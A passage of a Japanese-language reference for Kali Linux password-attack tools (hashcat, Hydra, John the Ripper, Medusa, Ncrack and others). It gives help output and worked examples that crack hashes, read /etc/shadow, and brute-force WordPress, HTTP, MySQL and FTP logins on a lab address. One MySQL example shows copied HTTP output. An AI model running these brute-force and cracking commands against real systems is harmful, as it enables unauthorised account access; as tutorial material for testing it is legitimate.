positional arguments:
INPUT input to analyze (default: STDIN)
options:
-e, --extended list all possible hash algorithms including salted passwords
-m, --mode show corresponding Hashcat mode in output
-j, --john show corresponding JohnTheRipper format in output
-o FILE, --outfile FILE write output to file
-h, --help show this help message and exit
--version show program\'s version number and exit
■ 使用例
root@kali:~# hashid '$P$BjlfCiZ7mwif9qwdfpsfDGn5C9tR4I0'
Analyzing '$P$BjlfCiZ7mwif9qwdfpsfDGn5C9tR4I0'
[+] Wordpress ≥ v2.6.2
[+] Joomla ≥ v2.5.18
[+] PHPass' Portable Hash
hashcat
パスワードの解読を行います。
■ 使用方法
root@kali:~# hashcat --help
Usage: hashcat [options]... hash|hashfile|hccapxfile [dictionary|mask|directory]...
- [ Options ] -
Options Short / Long | Type | Description | Example
================================+======+======================================================+=======================
-m, --hash-type | Num | Hash-type, references below (otherwise autodetect) | -m 1000
-a, --attack-mode | Num | Attack-mode, see references below | -a 3
-V, --version | | Print version |
-h, --help | | Print help |
--quiet | | Suppress output |
--hex-charset | | Assume charset is given in hex |
--hex-salt | | Assume salt is given in hex |
--hex-wordlist | | Assume words in wordlist are given in hex |
--force | | Ignore warnings |
--deprecated-check-disable | | Enable deprecated plugins |
--status | | Enable automatic update of the status screen |
--status-json | | Enable JSON format for status output |
--status-timer | Num | Sets seconds between status screen updates to X | --status-timer=1
--stdin-timeout-abort | Num | Abort if there is no input from stdin for X seconds | --stdin-timeout-abort=300
--machine-readable | | Display the status view in a machine-readable format |
--keep-guessing | | Keep guessing the hash after it has been cracked |
--self-test-disable | | Disable self-test functionality on startup |
--loopback | | Add new plains to induct directory |
--markov-hcstat2 | File | Specify hcstat2 file to use | --markov-hcstat2=my.hcstat2
--markov-disable | | Disables markov-chains, emulates classic brute-force |
--markov-classic | | Enables classic markov-chains, no per-position |
--markov-inverse | | Enables inverse markov-chains, no per-position |
-t, --markov-threshold | Num | Threshold X when to stop accepting new markov-chains | -t 50
--runtime | Num | Abort session after X seconds of runtime | --runtime=10
--session | Str | Define specific session name | --session=mysession
--restore | | Restore session from --session |
--restore-disable | | Do not write restore file |
--restore-file-path | File | Specific path to restore file | --restore-file-path=x.restore
-o, --outfile | File | Define outfile for recovered hash | -o outfile.txt
--outfile-format | Str | Outfile format to use, separated with commas | --outfile-format=1,3
--outfile-autohex-disable | | Disable the use of $HEX[] in output plains |
--outfile-check-timer | Num | Sets seconds between outfile checks to X | --outfile-check-timer=30
--wordlist-autohex-disable | | Disable the conversion of $HEX[] from the wordlist |
-p, --separator | Char | Separator char for hashlists and outfile | -p :
--stdout | | Do not crack a hash, instead print candidates only |
--show | | Compare hashlist with potfile; show cracked hashes |
--left | | Compare hashlist with potfile; show uncracked hashes |
--username | | Enable ignoring of usernames in hashfile |
--remove | | Enable removal of hashes once they are cracked |
--remove-timer | Num | Update input hash file each X seconds | --remove-timer=30
--potfile-disable | | Do not write potfile |
--potfile-path | File | Specific path to potfile | --potfile-path=my.pot
--encoding-from | Code | Force internal wordlist encoding from X | --encoding-from=iso-8859-15
--encoding-to | Code | Force internal wordlist encoding to X | --encoding-to=utf-32le
--debug-mode | Num | Defines the debug mode (hybrid only by using rules) | --debug-mode=4
--debug-file | File | Output file for debugging rules | --debug-file=good.log
--induction-dir | Dir | Specify the induction directory to use for loopback | --induction=inducts
--outfile-check-dir | Dir | Specify the outfile directory to monitor for plains | --outfile-check-dir=x
--logfile-disable | | Disable the logfile |
--hccapx-message-pair | Num | Load only message pairs from hccapx matching X | --hccapx-message-pair=2
--nonce-error-corrections | Num | The BF size range to replace AP\'s nonce last bytes | --nonce-error-corrections=16
--keyboard-layout-mapping | File | Keyboard layout mapping table for special hash-modes | --keyb=german.hckmap
--truecrypt-keyfiles | File | Keyfiles to use, separated with commas | --truecrypt-keyf=x.png
--veracrypt-keyfiles | File | Keyfiles to use, separated with commas | --veracrypt-keyf=x.txt
--veracrypt-pim-start | Num | VeraCrypt personal iterations multiplier start | --veracrypt-pim-start=450
--veracrypt-pim-stop | Num | VeraCrypt personal iterations multiplier stop | --veracrypt-pim-stop=500
-b, --benchmark | | Run benchmark of selected hash-modes |
--benchmark-all | | Run benchmark of all hash-modes (requires -b) |
--speed-only | | Return expected speed of the attack, then quit |
--progress-only | | Return ideal progress step size and time to process |
-c, --segment-size | Num | Sets size in MB to cache from the wordfile to X | -c 32
--bitmap-min | Num | Sets minimum bits allowed for bitmaps to X | --bitmap-min=24
--bitmap-max | Num | Sets maximum bits allowed for bitmaps to X | --bitmap-max=24
--cpu-affinity | Str | Locks to CPU devices, separated with commas | --cpu-affinity=1,2,3
--hook-threads | Num | Sets number of threads for a hook (per compute unit) | --hook-threads=8
--hash-info | | Show information for each hash-mode |
--example-hashes | | Alias of --hash-info |
--backend-ignore-cuda | | Do not try to open CUDA interface on startup |
--backend-ignore-hip | | Do not try to open HIP interface on startup |
--backend-ignore-metal | | Do not try to open Metal interface on startup |
--backend-ignore-opencl | | Do not try to open OpenCL interface on startup |
-I, --backend-info | | Show system/evironment/backend API info | -I or -II
-d, --backend-devices | Str | Backend devices to use, separated with commas | -d 1
-D, --opencl-device-types | Str | OpenCL device-types to use, separated with commas | -D 1
-O, --optimized-kernel-enable | | Enable optimized kernels (limits password length) |
-M, --multiply-accel-disable | | Disable multiply kernel-accel with processor count |
-w, --workload-profile | Num | Enable a specific workload profile, see pool below | -w 3
-n, --kernel-accel | Num | Manual workload tuning, set outerloop step size to X | -n 64
-u, --kernel-loops | Num | Manual workload tuning, set innerloop step size to X | -u 256
-T, --kernel-threads | Num | Manual workload tuning, set thread count to X | -T 64
--backend-vector-width | Num | Manually override backend vector-width to X | --backend-vector=4
--spin-damp | Num | Use CPU for device synchronization, in percent | --spin-damp=10
--hwmon-disable | | Disable temperature and fanspeed reads and triggers |
--hwmon-temp-abort | Num | Abort if temperature reaches X degrees Celsius | --hwmon-temp-abort=100
--scrypt-tmto | Num | Manually override TMTO value for scrypt to X | --scrypt-tmto=3
-s, --skip | Num | Skip X words from the start | -s 1000000
-l, --limit | Num | Limit X words from the start + skipped words | -l 1000000
--keyspace | | Show keyspace base:mod values and quit |
-j, --rule-left | Rule | Single rule applied to each word from left wordlist | -j 'c'
-k, --rule-right | Rule | Single rule applied to each word from right wordlist | -k '^-'
-r, --rules-file | File | Multiple rules applied to each word from wordlists | -r rules/best64.rule
-g, --generate-rules | Num | Generate X random rules | -g 10000
--generate-rules-func-min | Num | Force min X functions per rule |
--generate-rules-func-max | Num | Force max X functions per rule |
--generate-rules-func-sel | Str | Pool of rule operators valid for random rule engine | --generate-rules-func-sel=ioTlc
--generate-rules-seed | Num | Force RNG seed set to X |
-1, --custom-charset1 | CS | User-defined charset ?1 | -1 ?l?d?u
-2, --custom-charset2 | CS | User-defined charset ?2 | -2 ?l?d?s
-3, --custom-charset3 | CS | User-defined charset ?3 |
-4, --custom-charset4 | CS | User-defined charset ?4 |
--identify | | Shows all supported algorithms for input hashes | --identify my.hash
-i, --increment | | Enable mask increment mode |
--increment-min | Num | Start mask incrementing at X | --increment-min=4
--increment-max | Num | Stop mask incrementing at X | --increment-max=8
-S, --slow-candidates | | Enable slower (but advanced) candidate generators |
--brain-server | | Enable brain server |
--brain-server-timer | Num | Update the brain server dump each X seconds (min:60) | --brain-server-timer=300
-z, --brain-client | | Enable brain client, activates -S |
--brain-client-features | Num | Define brain client features, see below | --brain-client-features=3
--brain-host | Str | Brain server host (IP or domain) | --brain-host=127.0.0.1
--brain-port | Port | Brain server port | --brain-port=13743
--brain-password | Str | Brain server authentication password | --brain-password=bZfhCvGUSjRq
--brain-session | Hex | Overrides automatically calculated brain session | --brain-session=0x2ae611db
--brain-session-whitelist | Hex | Allow given sessions only, separated with commas | --brain-session-whitelist=0x2ae611db
■ 使用例
root@kali:~# echo "$P$BjlfCiZ7mwif9qwdfpsfDGn5C9tR4I0" > hash.txt
# phpassでハッシュ化されたパスワードを4文字以上5文字以下のアルファベット小文字で総当たりの解析を行う
root@kali:~# hashcat -a 3 -m 400 --increment --increment-min 4 --increment-max 5 hash.txt ?l?l?l?l?l
hashcat (v6.2.6) starting
OpenCL API (OpenCL 3.0 PoCL 6.0+debian Linux, None+Asserts, RELOC, LLVM 17.0.6, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
============================================================================================================================================
* Device #1: cpu-haswell-Intel(R) Core(TM) i7-8565U CPU @ 1.80GHz, 2889/5842 MB (1024 MB allocatable), 8MCU
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
[...]
$P$BjlfCiZ7mwif9qwdfpsfDGn5C9tR4I0:pass
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 400 (phpass)
Hash.Target......: $P$BjlfCiZ7mwif9qwdfpsfDGn5C9tR4I0
Time.Started.....: Sat Oct 12 09:04:54 2024 (4 secs)
Time.Estimated...: Sat Oct 12 09:04:58 2024 (0 secs)
[...]
Hydra
様々なプロトコルのパスワード認証に対してブルートフォース攻撃を行います。
■ 使用方法
root@kali:~# hydra -h
Syntax: hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e nsr] [-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-W TIME] [-f] [-s PORT] [-x MIN:MAX:CHARSET] [-c TIME] [-ISOuvVd46] [-m MODULE_OPT] [service://server[:PORT][/OPT]]
Options:
-R restore a previous aborted/crashed session
-I ignore an existing restore file (don\'t wait 10 seconds)
-S perform an SSL connect
-s PORT if the service is on a different default port, define it here
-l LOGIN or -L FILE login with LOGIN name, or load several logins from FILE
-p PASS or -P FILE try password PASS, or load several passwords from FILE
-x MIN:MAX:CHARSET password bruteforce generation, type "-x -h" to get help
-y disable use of symbols in bruteforce, see above
-r use a non-random shuffling method for option -x
-e nsr try "n" null password, "s" login as pass and/or "r" reversed login
-u loop around users, not passwords (effective! implied with -x)
-C FILE colon separated "login:pass" format, instead of -L/-P options
-M FILE list of servers to attack, one entry per line, ':' to specify port
-o FILE write found login/password pairs to FILE instead of stdout
-b FORMAT specify the format for the -o FILE: text(default), json, jsonv1
-f / -F exit when a login/pass pair is found (-M: -f per host, -F global)
-t TASKS run TASKS number of connects in parallel per target (default: 16)
-T TASKS run TASKS connects in parallel overall (for -M, default: 64)
-w / -W TIME wait time for a response (32) / between connects per thread (0)
-c TIME wait time per login attempt over all threads (enforces -t 1)
-4 / -6 use IPv4 (default) / IPv6 addresses (put always in [] also in -M)
-v / -V / -d verbose mode / show login+pass for each attempt / debug mode
-O use old SSL v2 and v3
-K do not redo failed attempts (good for -M mass scanning)
-q do not print messages about connection errors
-U service module usage details
-m OPT options specific for a module, see -U output for information
-h more command line options (COMPLETE HELP)
server the target: DNS, IP or 192.168.0.0/24 (this OR the -M option)
service the service to crack (see below for supported protocols)
OPT some service modules support additional input (-U for module help)
Supported services: adam6500 asterisk cisco cisco-enable cobaltstrike cvs firebird ftp[s] http[s]-{head|get|post} http[s]-{get|post}-form http-proxy http-proxy-urlenum icq imap[s] irc ldap2[s] ldap3[-{cram|digest}md5][s] memcached mongodb mssql mysql nntp oracle-listener oracle-sid pcanywhere pcnfs pop3[s] postgres radmin2 rdp redis rexec rlogin rpcap rsh rtsp s7-300 sip smb smtp[s] smtp-enum snmp socks5 ssh sshkey svn teamspeak telnet[s] vmauthd vnc xmpp
■ 使用例
# WordPressのログイン画面にパスワードリスト攻撃を行う
root@kali:~# hydra -L usernames.txt -P passwords.txt -s 80 \
http-post-form://192.168.11.4/wp-login.php:"log=^USER^&pwd=^PASS^":2=:F=
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-10-16 03:53:53
[DATA] max 16 tasks per 1 server, overall 16 tasks, 1870 login tries (l:17/p:110), ~117 tries per task
[DATA] attacking http-post-form://192.168.11.4:80/wp-login.php:log=^USER^&pwd=^PASS^:2=:F=
[80][http-post-form] host: 192.168.11.4 login: admin password: pass
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-10-16 03:54:31
John the Ripper
パスワードの解読を行います。
■ 使用方法
root@kali:~# john --help
Usage: john [OPTIONS] [PASSWORD-FILES]
--help Print usage summary
--single[=SECTION[,..]] "Single crack" mode, using default or named rules
--single=:rule[,..] Same, using "immediate" rule(s)
--single-seed=WORD[,WORD] Add static seed word(s) for all salts in single mode
--single-wordlist=FILE *Short* wordlist with static seed words/morphemes
--single-user-seed=FILE Wordlist with seeds per username (user:password[s]
format)
--single-pair-max=N Override max. number of word pairs generated (6)
--no-single-pair Disable single word pair generation
--[no-]single-retest-guess Override config for SingleRetestGuess
--wordlist[=FILE] --stdin Wordlist mode, read words from FILE or stdin
--pipe like --stdin, but bulk reads, and allows rules
--rules[=SECTION[,..]] Enable word mangling rules (for wordlist or PRINCE
modes), using default or named rules
--rules=:rule[;..]] Same, using "immediate" rule(s)
--rules-stack=SECTION[,..] Stacked rules, applied after regular rules or to
modes that otherwise don\'t support rules
--rules-stack=:rule[;..] Same, using "immediate" rule(s)
--rules-skip-nop Skip any NOP ":" rules (you already ran w/o rules)
--loopback[=FILE] Like --wordlist, but extract words from a .pot file
--mem-file-size=SIZE Size threshold for wordlist preload (default 2048 MB)
--dupe-suppression Suppress all dupes in wordlist (and force preload)
--incremental[=MODE] "Incremental" mode [using section MODE]
--incremental-charcount=N Override CharCount for incremental mode
--external=MODE External mode or word filter
--mask[=MASK] Mask mode using MASK (or default from john.conf)
--markov[=OPTIONS] "Markov" mode (see doc/MARKOV)
--mkv-stats=FILE "Markov" stats file
--prince[=FILE] PRINCE mode, read words from FILE
--prince-loopback[=FILE] Fetch words from a .pot file
--prince-elem-cnt-min=N Minimum number of elements per chain (1)
--prince-elem-cnt-max=[-]N Maximum number of elements per chain (negative N is
relative to word length) (8)
--prince-skip=N Initial skip
--prince-limit=N Limit number of candidates generated
--prince-wl-dist-len Calculate length distribution from wordlist
--prince-wl-max=N Load only N words from input wordlist
--prince-case-permute Permute case of first letter
--prince-mmap Memory-map infile (not available with case permute)
--prince-keyspace Just show total keyspace that would be produced
(disregarding skip and limit)
--subsets[=CHARSET] "Subsets" mode (see doc/SUBSETS)
--subsets-required=N The N first characters of "subsets" charset are
the "required set"
--subsets-min-diff=N Minimum unique characters in subset
--subsets-max-diff=[-]N Maximum unique characters in subset (negative N is
relative to word length)
--subsets-prefer-short Prefer shorter candidates over smaller subsets
--subsets-prefer-small Prefer smaller subsets over shorter candidates
--make-charset=FILE Make a charset, FILE will be overwritten
--stdout[=LENGTH] Just output candidate passwords [cut at LENGTH]
--session=NAME Give a new session the NAME
--status[=NAME] Print status of a session [called NAME]
--restore[=NAME] Restore an interrupted session [called NAME]
--[no-]crack-status Emit a status line whenever a password is cracked
--progress-every=N Emit a status line every N seconds
--show[=left] Show cracked passwords [if =left, then uncracked]
--show=formats Show information about hashes in a file (JSON)
--show=invalid Show lines that are not valid for selected format(s)
--test[=TIME] Run tests and benchmarks for TIME seconds each
(if TIME is explicitly 0, test w/o benchmark)
--stress-test[=TIME] Loop self tests forever
--test-full=LEVEL Run more thorough self-tests
--no-mask Used with --test for alternate benchmark w/o mask
--skip-self-tests Skip self tests
--users=[-]LOGIN|UID[,..] [Do not] load this (these) user(s) only
--groups=[-]GID[,..] Load users [not] of this (these) group(s) only
--shells=[-]SHELL[,..] Load users with[out] this (these) shell(s) only
--salts=[-]COUNT[:MAX] Load salts with[out] COUNT [to MAX] hashes, or
--salts=#M[-N] Load M [to N] most populated salts
--costs=[-]C[:M][,...] Load salts with[out] cost value Cn [to Mn]. For
tunable cost parameters, see doc/OPTIONS
--fork=N Fork N processes
--node=MIN[-MAX]/TOTAL This node\'s number range out of TOTAL count
--save-memory=LEVEL Enable memory saving, at LEVEL 1..3
--log-stderr Log to screen instead of file
--verbosity=N Change verbosity (1-5 or 6 for debug, default 3)
--no-log Disables creation and writing to john.log file
--bare-always-valid=Y Treat bare hashes as valid (Y/N)
--catch-up=NAME Catch up with existing (paused) session NAME
--config=FILE Use FILE instead of john.conf or john.ini
--encoding=NAME Input encoding (eg. UTF-8, ISO-8859-1). See also
doc/ENCODINGS.
--input-encoding=NAME Input encoding (alias for --encoding)
--internal-codepage=NAME Codepage used in rules/masks (see doc/ENCODINGS)
--target-encoding=NAME Output encoding (used by format)
--force-tty Set up terminal for reading keystrokes even if we\'re
not the foreground process
--field-separator-char=C Use 'C' instead of the ':' in input and pot files
--[no-]keep-guessing Try finding plaintext collisions
--list=WHAT List capabilities, see --list=help or doc/OPTIONS
--length=N Shortcut for --min-len=N --max-len=N
--min-length=N Request a minimum candidate length in bytes
--max-length=N Request a maximum candidate length in bytes
--max-candidates=[-]N Gracefully exit after this many candidates tried.
(if negative, reset count on each crack)
--max-run-time=[-]N Gracefully exit after this many seconds (if negative,
reset timer on each crack)
--mkpc=N Request a lower max. keys per crypt
--no-loader-dupecheck Disable the dupe checking when loading hashes
--pot=NAME Pot file to use
--regen-lost-salts=N Brute force unknown salts (see doc/OPTIONS)
--reject-printable Reject printable binaries
--tune=HOW Tuning options (auto/report/N)
--subformat=FORMAT Pick a benchmark format for --format=crypt
--format=[NAME|CLASS][,..] Force hash of type NAME. The supported formats can
be seen with --list=formats and --list=subformats.
See also doc/OPTIONS for more advanced selection of
format(s), including using classes and wildcards.
■ 使用例
# パスワードファイルのハッシュアルゴリズムがyescryptなのでformatにcrypt(システム標準関数)を指定
root@kali:~# john /etc/shadow --format=crypt
Using default input encoding: UTF-8
Loaded 1 password hash (crypt, generic crypt(3) [?/64])
Cost 1 (algorithm [1:descrypt 2:md5crypt 3:sunmd5 4:bcrypt 5:sha256crypt 6:sha512crypt]) is 0 for all loaded hashes
Cost 2 (algorithm specific iterations) is 1 for all loaded hashes
Will run 8 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
hello (hello)
1g 0:00:00:00 DONE 1/3 (2024-10-19 11:42) 3.125g/s 300.0p/s 300.0c/s 300.0C/s hello..hello999993
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
root@kali:~# john /etc/shadow --show
hello:hello:20015:0:99999:7:::
1 password hash cracked, 0 left
GUI版のJohnnyでパスワードを解読
maskprocessor
ブルートフォース攻撃用の単語リストを作成します。
■ 使用方法
root@kali:~# mp64 --help
High-Performance word generator with a per-position configureable charset
Usage: mp64 [options]... mask
* Startup:
-V, --version Print version
-h, --help Print help
* Increment:
-i, --increment=NUM:NUM Enable increment mode. 1st NUM=start, 2nd NUM=stop
Example: -i 4:8 searches lengths 4-8 (inclusive)
* Misc:
--combinations Calculate number of combinations
--hex-charset Assume charset is given in hex
-q, --seq-max=NUM Maximum number of multiple sequential characters
-r, --occurrence-max=NUM Maximum number of occurrence of a character
* Resources:
-s, --start-at=WORD Start at specific position
-l, --stop-at=WORD Stop at specific position
* Files:
-o, --output-file=FILE Output-file
* Custom charsets:
-1, --custom-charset1=CS User-defineable charsets
-2, --custom-charset2=CS Example:
-3, --custom-charset3=CS --custom-charset1=?dabcdef
-4, --custom-charset4=CS sets charset ?1 to 0123456789abcdef
* Built-in charsets:
?l = abcdefghijklmnopqrstuvwxyz
?u = ABCDEFGHIJKLMNOPQRSTUVWXYZ
?d = 0123456789
?s = !"#$%&'()*+,-./:;<=>?@[\]^_`{|}~
?a = ?l?u?d?s
?b = 0x00 - 0xff
■ 使用例
# 英小文字・英大文字・数字の組み合わせで文字列長5文字の単語リストを作成
root@kali:~# mp64 -1 ?l?u?d ?1?1?1?1?1 -o words.txt
root@kali:~# head -n 10 words.txt
aaaaa
aaaab
aaaac
aaaad
aaaae
aaaaf
aaaag
aaaah
aaaai
aaaaj
root@kali:~# tail -n 10 words.txt
99990
99991
99992
99993
99994
99995
99996
99997
99998
99999
Medusa
HTTP、SMB、SSH、FTP、RDBMSなどのログイン認証に対してブルートフォース攻撃を行います。
■ 使用方法
root@kali:~# medusa
Syntax: Medusa [-h host|-H file] [-u username|-U file] [-p password|-P file] [-C file] -M module [OPT]
-h [TEXT] : Target hostname or IP address
-H [FILE] : File containing target hostnames or IP addresses
-u [TEXT] : Username to test
-U [FILE] : File containing usernames to test
-p [TEXT] : Password to test
-P [FILE] : File containing passwords to test
-C [FILE] : File containing combo entries. See README for more information.
-O [FILE] : File to append log information to
-e [n/s/ns] : Additional password checks ([n] No Password, [s] Password = Username)
-M [TEXT] : Name of the module to execute (without the .mod extension)
-m [TEXT] : Parameter to pass to the module. This can be passed multiple times with a
different parameter each time and they will all be sent to the module (i.e.
-m Param1 -m Param2, etc.)
-d : Dump all known modules
-n [NUM] : Use for non-default TCP port number
-s : Enable SSL
-g [NUM] : Give up after trying to connect for NUM seconds (default 3)
-r [NUM] : Sleep NUM seconds between retry attempts (default 3)
-R [NUM] : Attempt NUM retries before giving up. The total number of attempts will be NUM + 1.
-c [NUM] : Time to wait in usec to verify socket is available (default 500 usec).
-t [NUM] : Total number of logins to be tested concurrently
-T [NUM] : Total number of hosts to be tested concurrently
-L : Parallelize logins using one username per thread. The default is to process
the entire username before proceeding.
-f : Stop scanning host after first valid username/password found.
-F : Stop audit after first valid username/password found on any host.
-b : Suppress startup banner
-q : Display module\'s usage information
-v [NUM] : Verbose level [0 - 6 (more)]
-w [NUM] : Error debug level [0 - 10 (more)]
-V : Display version
-Z [TEXT] : Resume scan based on map of previous scan
root@kali:~# medusa -d
Available modules in "/usr/lib/x86_64-linux-gnu/medusa/modules" :
+ cvs.mod : Brute force module for CVS sessions : version 2.0
+ ftp.mod : Brute force module for FTP/FTPS sessions : version 2.1
+ http.mod : Brute force module for HTTP : version 2.1
+ imap.mod : Brute force module for IMAP sessions : version 2.0
+ mssql.mod : Brute force module for M$-SQL sessions : version 2.0
+ mysql.mod : Brute force module for MySQL sessions : version 2.0
+ nntp.mod : Brute force module for NNTP sessions : version 2.0
+ pcanywhere.mod : Brute force module for PcAnywhere sessions : version 2.0
+ pop3.mod : Brute force module for POP3 sessions : version 2.0
+ postgres.mod : Brute force module for PostgreSQL sessions : version 2.0
+ rexec.mod : Brute force module for REXEC sessions : version 2.0
+ rlogin.mod : Brute force module for RLOGIN sessions : version 2.0
+ rsh.mod : Brute force module for RSH sessions : version 2.0
+ smbnt.mod : Brute force module for SMB (LM/NTLM/LMv2/NTLMv2) sessions : version 2.1
+ smtp-vrfy.mod : Brute force module for verifying SMTP accounts (VRFY/EXPN/RCPT TO) : version 2.1
+ smtp.mod : Brute force module for SMTP Authentication with TLS : version 2.0
+ snmp.mod : Brute force module for SNMP Community Strings : version 2.1
+ ssh.mod : Brute force module for SSH v2 sessions : version 2.1
+ svn.mod : Brute force module for Subversion sessions : version 2.1
+ telnet.mod : Brute force module for telnet sessions : version 2.0
+ vmauthd.mod : Brute force module for the VMware Authentication Daemon : version 2.0
+ vnc.mod : Brute force module for VNC sessions : version 2.1
+ web-form.mod : Brute force module for web forms : version 2.1
+ wrapper.mod : Generic Wrapper Module : version 2.0
■ 使用例
# HTTP Basic認証にブルートフォース攻撃
root@kali:~# medusa -v 4 -h 192.168.11.4 -U usernames.txt -P passwords.txt -M http -m AUTH BASIC
ACCOUNT FOUND: [http] Host: 192.168.11.4 User: hello Password: hello [SUCCESS]
# MySQLのパスワード認証にブルートフォース攻撃
root@kali:~# medusa -v 4 -h 192.168.11.4 -U usernames.txt -P passwords.txt -M mysql
ACCOUNT FOUND: [http] Host: 192.168.11.4 User: hello Password: hello [SUCCESS]
Name That Hash
300種類以上のハッシュを識別し名前などの情報を表示します。
■ 使用方法
root@kali:~# nth --help
Usage: nth [OPTIONS]
Options:
-t, --text TEXT Check one hash, use single quotes \' as inverted commas
\" messes up on Linux.
-f, --file FILENAME Checks every hash in a newline separated file.
-g, --greppable Are you going to grep this output? Prints in JSON
format.
-b64, --base64 Decodes hashes in Base64 before identification. For
files with mixed Base64 & non-encoded it attempts
base64 first and then falls back to normal hash
identification per hash.
-a, --accessible Turn on accessible mode, does not print ASCII art. Also
does not print very large blocks of text, as this can
cause some pain with screenreaders. This reduces the
information you get. If you want the least likely
feature but no banner, use --no-banner.
-e, --extreme Searches for hashes within a string. This mode will get
5d41402abc4b2a76b9719d911017c592 from
####5d41402abc4b2a76b9719d911017c592###
--no-banner Removes banner from startup.
--no-john Don\'t print John The Ripper Information.
--no-hashcat Don\'t print Hashcat Information.
-v, --verbose Turn on debugging logs. -vvv for maximum logs.
--help Show this message and exit.
■ 使用例
root@kali:~# nth -t '$2a$05$LhayLxezLhK1LhWvKxCyLOj0j1u.Kj0jZ0pEmm134uzrQlFvQJLF6' --no-john --no-banner
$2a$05$LhayLxezLhK1LhWvKxCyLOj0j1u.Kj0jZ0pEmm134uzrQlFvQJLF6
Most Likely
bcrypt, HC: 3200
Blowfish(OpenBSD), HC: 3200 Summary: Can be used in Linux Shadow Files.
Woltlab Burning Board 4.x,
root@kali:~# nth -t '$P$984478476IagS59wHZvyQMArzfx58u.' --no-john -g | \
jq '. | to_entries[] | del(.value[].john,.value[].extended,.value[].description) | { (.key): [.value[] | @text "\(.name) ,HC: \(.hashcat)"] }'
{
"$P$984478476IagS59wHZvyQMArzfx58u.": [
"Wordpress ≥ v2.6.2 ,HC: 400",
"Joomla ≥ v2.5.18 ,HC: 400",
"PHPass' Portable Hash ,HC: 400"
]
}
Ncrack
HTTP、SMB、SSH、FTP、POP3、IMAP、RDBMSなどのログイン認証に対してブルートフォース攻撃を行います。
■ 使用方法
root@kali:~# ncrack --help
Usage: ncrack [Options] {target and service specification}
TARGET SPECIFICATION:
Can pass hostnames, IP addresses, networks, etc.
Ex: scanme.nmap.org, microsoft.com/24, 192.168.0.1; 10.0.0-255.1-254
-iX <inputfilename>: Input from Nmap\'s -oX XML output format
-iN <inputfilename>: Input from Nmap\'s -oN Normal output format
-iL <inputfilename>: Input from list of hosts/networks
--exclude <host1[,host2][,host3],...>: Exclude hosts/networks
--excludefile <exclude_file>: Exclude list from file
SERVICE SPECIFICATION:
Can pass target specific services in <service>://target (standard) notation or
using -p which will be applied to all hosts in non-standard notation.
Service arguments can be specified to be host-specific, type of service-specific
(-m) or global (-g). Ex: ssh://10.0.0.10,at=10,cl=30 -m ssh:at=50 -g cd=3000
Ex2: ncrack -p ssh,ftp:3500,25 10.0.0.10 scanme.nmap.org google.com:80,ssl
-p <service-list>: services will be applied to all non-standard notation hosts
-m <service>:<options>: options will be applied to all services of this type
-g <options>: options will be applied to every service globally
Misc options:
ssl: enable SSL over this service
path <name>: used in modules like HTTP ('=' needs escaping if used)
db <name>: used in modules like MongoDB to specify the database
domain <name>: used in modules like WinRM to specify the domain
TIMING AND PERFORMANCE:
Options which take <time> are in seconds, unless you append 'ms'
(milliseconds), 'm' (minutes), or 'h' (hours) to the value (e.g. 30m).
Service-specific options:
cl (min connection limit): minimum number of concurrent parallel connections
CL (max connection limit): maximum number of concurrent parallel connections
at (authentication tries): authentication attempts per connection
cd (connection delay): delay <time> between each connection initiation
cr (connection retries): caps number of service connection attempts
to (time-out): maximum cracking <time> for service, regardless of success so far
-T<0-5>: Set timing template (higher is faster)
--connection-limit <number>: threshold for total concurrent connections
--stealthy-linear: try credentials using only one connection against each specified host
until you hit the same host again. Overrides all other timing options.
AUTHENTICATION:
-U <filename>: username file
-P <filename>: password file
--user <username_list>: comma-separated username list
--pass <password_list>: comma-separated password list
--passwords-first: Iterate password list for each username. Default is opposite.
--pairwise: Choose usernames and passwords in pairs.
OUTPUT:
-oN/-oX <file>: Output scan in normal and XML format, respectively, to the given filename.
-oA <basename>: Output in the two major formats at once
-v: Increase verbosity level (use twice or more for greater effect)
-d[level]: Set or increase debugging level (Up to 10 is meaningful)
--nsock-trace <level>: Set nsock trace level (Valid range: 0 - 10)
--log-errors: Log errors/warnings to the normal-format output file
--append-output: Append to rather than clobber specified output files
MISC:
--resume <file>: Continue previously saved session
--save <file>: Save restoration file with specific filename
-f: quit cracking service after one found credential
-6: Enable IPv6 cracking
-sL or --list: only list hosts and services
--datadir <dirname>: Specify custom Ncrack data file location
--proxy <type://proxy:port>: Make connections via socks4, 4a, http.
-V: Print version number
-h: Print this help summary page.
MODULES:
SSH, RDP, FTP, Telnet, HTTP(S), Wordpress, POP3(S), IMAP, CVS, SMB, VNC, SIP, Redis, PostgreSQL, MQTT, MySQL, MSSQL, MongoDB, Cassandra, WinRM, OWA, DICOM
■ 使用例
root@kali:~# ncrack -v -f -U users.txt -P passwords.txt ftp://192.168.11.4
Starting Ncrack 0.7 ( http://ncrack.org ) at 2024-10-28 03:13 UTC
Discovered credentials on ftp://192.168.11.4:21 'hello' 'hello'
ftp://192.168.11.4:21 finished.
Discovered credentials for ftp on 192.168.11.4 21/tcp:
192.168.11.4 21/tcp ftp: 'hello' 'hello'
Ncrack done: 1 service scanned in 3.03 seconds.
Probes sent: 1 | timed-out: 0 | prematurely-closed: 0
Ncrack finished.
PACK
パスワード分析を行うためのツールキットです。
■ 使用方法
root@kali:~# statsgen --help
Usage: statsgen [options] passwords.txt
Type --help for more options
Options:
--version show program\'s version number and exit
-h, --help show this help message and exit
-o password.masks, --output=password.masks
Save masks and stats to a file
--hiderare Hide statistics covering less than 1% of the sample
-q, --quiet Don\'t show headers.
Password Filters:
--minlength=8 Minimum password length
--maxlength=8 Maximum password length
--charset=loweralpha,numeric
Password charset filter (comma separated)
--simplemask=stringdigit,allspecial
Password mask filter (comma separated)
root@kali:~# maskgen --help
Usage: maskgen pass0.masks [pass1.masks ...] [options]
Options:
--version show program\'s version number and exit
-h, --help show this help message and exit
-t 86400, --targettime=86400
Target time of all masks (seconds)
-o masks.hcmask, --outputmasks=masks.hcmask
